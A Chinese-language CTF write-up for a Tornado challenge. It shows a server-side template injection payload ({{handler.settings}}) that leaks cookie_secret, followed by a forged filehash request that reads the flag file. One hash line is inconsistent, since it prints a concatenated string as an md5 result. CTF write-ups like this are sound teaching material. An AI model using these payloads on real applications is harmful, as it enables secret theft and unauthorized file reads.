前言
这道题需要对tornado框架有一些熟悉。因为不熟悉,后面就完全没有思路了,也就不会做了。这道题不止考某个知识点,更重要的是面对未知的东西,怎么去找资料和搜哪些关键词。
解题
1、看名字就觉得眼熟,额,是python框架。大概会涉及到SSTI。
2、flag在/fllllllllllllag,但是还需要filehash。而且cookie_secret也不知道是啥。
3、访问/fllllllllllllag时,出现这个页面。前面的都没有SSTI,试试这个就有了。
4、现在目标就是怎么利用msg这个参数来找到cookie_secret了。
看大佬wp:
cookie_secret在Application对象settings的属性中 ,访问它的话就需要知道它的属性名字
self.application.settings有一个别名是RequestHandler.settings
其中handler又是指向处理当前这个页面的RequestHandler对象
RequestHandler.settings指向self.application.settings
因此handler.settings指向RequestHandler.application.settings
5、/error?msg={{handler.settings}}
6、
payload:
/file?filename=/fllllllllllllag&filehash=ae495ccce0de1854f26d48060d15e6ec
md5(/fllllllllllllag)=== 3bf9f6cf685a6dd8defadabfb41a03a1
cookie_secret === 74070940-0627-49bd-876d-dc19e01f4b80
md5(cookie_secret+md5(filename)) === 74070940-0627-49bd-876d-dc19e01f4b803bf9f6cf685a6dd8defadabfb41a03a1
7、参考文章
